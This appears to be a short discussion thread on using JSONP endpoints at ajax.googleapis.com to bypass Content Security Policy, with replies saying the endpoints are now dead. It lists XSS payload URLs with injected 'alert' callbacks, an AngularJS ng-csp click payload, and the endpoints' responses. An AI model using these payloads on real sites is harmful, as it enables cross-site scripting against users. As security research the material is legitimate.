both ajax.googleapis.com endpoints are dead

[aaronesau-summit]

ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337
ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>
ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js

https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt#L60 https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt#L61

[aaronesau-summit]

I found that these JSONP endpoint allows us to execute semi-arbitrary JS again, although we can only specify function names (alphanumeric only):

http://ajax.googleapis.com/ajax/services/search/web?v=1.0&q=AAA&callback=alert

/* callback */alert({"responseData": null, "responseDetails": "The Google Web Search API is no longer available. Please migrate to the Google Custom Search API (https://developers.google.com/custom-search/)", "responseStatus": 403})

http://ajax.googleapis.com/ajax/services/search/images?v=1.0&q=AAA&callback=alert

/* callback */alert({"responseData": null, "responseDetails": "This API is no longer available.", "responseStatus": 403})

http://ajax.googleapis.com/ajax/services/search/local?callback=alert&v=1.0&q=AAA

/* callback */alert({"responseData": null, "responseDetails": "The Google Local Search API is no longer available. Please migrate to the Google Places API (https://developers.google.com/places)", "responseStatus": 403})

http://ajax.googleapis.com/ajax/services/language/detect?v=1.0&q=AAA&callback=alert

/* callback */alert({"responseData": null, "responseDetails": "Please use Translate v2.  See http://code.google.com/apis/language/translate/overview.html", "responseStatus": 403})

[Ximaz]

Still dead.